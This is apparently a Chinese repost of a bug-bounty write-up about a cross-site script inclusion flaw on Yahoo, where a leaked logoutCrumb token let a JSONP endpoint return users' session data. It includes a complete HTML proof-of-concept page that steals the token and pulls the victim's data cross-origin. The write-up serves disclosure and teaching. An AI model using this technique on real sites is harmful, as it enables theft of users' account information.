發(fā)現(xiàn)雅虎XSSi漏洞實(shí)現(xiàn)用戶信息竊取的示例分析

本篇文章為大家展示了發(fā)現(xiàn)雅虎XSSi漏洞實(shí)現(xiàn)用戶信息竊取的示例分析，內(nèi)容簡明扼要并且容易理解，絕對能使你眼前一亮，通過這篇文章的詳細(xì)介紹希望你能有所收獲。

發(fā)現(xiàn)某種特定類別漏洞由兩個關(guān)鍵部分組成，那就是對漏洞的認(rèn)知以及挖掘的難易程度?？缯灸_本包含漏洞（XSSi）在公認(rèn)的安全標(biāo)準(zhǔn)OWASP TOP 10中并未被提及，而且它也沒有一些公開可利用的工具。但它的影響涉及個人存儲信息泄露、token保護(hù)機(jī)制繞過以及賬戶劫持等。目前來說，由于XSSi漏洞存在廣泛且缺乏有效的檢測手段，導(dǎo)致其漏洞危害程度增加。下面我將分享我發(fā)現(xiàn)的一個雅虎XSSi漏洞，利用該漏洞可以實(shí)現(xiàn)對雅虎用戶的信息竊取。

端倪

在參與雅虎（Yahoo）漏洞眾測項(xiàng)目中，在我某次用BurpSuite來進(jìn)行抓包分析時，偶然看到了以下這個請求：

在我發(fā)現(xiàn)這是一個JSONP服務(wù)端之后，我立馬意識到這可能會形成一個XSSi漏洞（跨站腳本包含）。在雅虎網(wǎng)站API中，.crumb 值其實(shí)就是一個隨機(jī)字符串，它與用戶的session和身份驗(yàn)證值相關(guān)，我注意到，如果在該請求中，GET參數(shù) .crumb 值無效的話，其響應(yīng)如下：

利用

現(xiàn)在，我想，如果能以某種方式去竊取到受害者的有效.crumb 值的話，那么就能竊取到對方的具體賬號信息值了。因此，我就在BurpSuite的抓包中來查找所有包含有效 .crumb 值的請求，最終，我發(fā)現(xiàn)了在某個動態(tài)的Javascript文件存在這樣的信息，該Javascript文件位于https://messenger.yahoo.com/embed/app.js。如果你現(xiàn)在去檢查這個Javascript文件，你會發(fā)現(xiàn)它其中的    logoutCrumb 值已經(jīng)被刪除修復(fù)了，我初次發(fā)現(xiàn)時，它的源代碼如下： 

現(xiàn)在，XSSi 漏洞原理其實(shí)是這樣的，它允許攻擊者繞過原始邊界竊取特定類型數(shù)據(jù)，利用了<script>標(biāo)記的src屬性來突破同源策略( SOP），也即在<script>標(biāo)記中，瀏覽器不會阻止網(wǎng)頁加載圖像和文字等第三方資源。因此，為了竊取    https://messenger.yahoo.com/embed/app.js中的有效回調(diào) .crumb 值，然后把它放置在鏈接https://jsapi.login.yahoo.com/w/device_users?.crumb=POR1.kRjsx中進(jìn)行請求，以獲取到相關(guān)用戶的session信息，我編寫了如下PoC代碼：

<html>    <head>        <title>Yahoo XSSi PoC</title>    </head>    <body>               <div >            <h2 >Proof of Concept</h2>            <b>Dataset 1:</b>            <div id="content1" ></div>            <br/>            <b>Dataset 2:</b>            <div id="content2" ></div>        </div>        <script>            function processDeviceUsers(data) {                document.getElementById("content1").innerHTML = JSON.stringify(data);            }            window.onload = function () {                var config = {};                config_data = {};                config.merge = function(data) { config_data = data };                iris.initConfig(config);                document.getElementById("content2").innerHTML =  JSON.stringify(config_data);                var src = "https://jsapi.login.yahoo.com/w/device_users?.crumb=" + config_data.session.logoutCrumb;                var s = document.createElement('script');                s.setAttribute('src', src);                document.body.appendChild(s);            }           </script>        <script src="https://messenger.yahoo.com/embed/app.js"></script>        <script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>    </body></html>

以下就是測試的效果圖：

上述內(nèi)容就是發(fā)現(xiàn)雅虎XSSi漏洞實(shí)現(xiàn)用戶信息竊取的示例分析，你們學(xué)到知識或技能了嗎？如果還想學(xué)到更多技能或者豐富自己的知識儲備，歡迎關(guān)注億速云行業(yè)資訊頻道。